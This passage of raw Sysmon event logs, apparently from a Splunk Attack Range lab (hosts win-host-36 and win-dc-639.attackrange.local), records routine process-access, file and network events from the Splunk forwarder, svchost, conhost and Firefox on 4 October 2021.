Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DECE1436DB51F77AFF9E12D79B316B,SHA256=BDE0CF906537AF2C0C56F406B12897CB9A9A12BC50BCBBCA07191FA980C6AFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083698Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:30.556{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91C73070DC3522CEA8573D0269AE4579,SHA256=D5075357D71FDE1A670FD5AC2D4B0B21F8772727339DFA5A5B10432AE13E02A0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000108214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:30.617{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\SiteSecurityServiceState.txt2021-10-04 08:03:30.617 10341000x800000000000000083726Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B553-615A-9E01-00000000FD01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083725Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083724Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083723Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083722Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083721Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083720Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083719Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083718Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083717Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083716Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B553-615A-9E01-00000000FD01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083715Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.900{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B553-615A-9E01-00000000FD01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083714Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.901{2FDD8D40-B553-615A-9E01-00000000FD01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083713Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.556{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1CE71B4F535B1DB423DB5E57CF5DFA4,SHA256=98CE65033B1F47B9FBEA4CDA4091E9AED74022BF7FBD12C2E10EBD1A93106234,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:31.681{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04341F7E84BDAF92F4EC12E7935D76BA,SHA256=87E9C3486117462DF3035E9DDF00E754B0E11151C5CCB72C29D82F2CCE3E006A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:29.325{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51949-false10.0.1.12-8000- 10341000x800000000000000083712Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B553-615A-9D01-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083711Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083710Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083709Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083708Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083707Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083706Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083705Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083704Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083703Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083702Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B553-615A-9D01-00000000FD01}172C:\Program 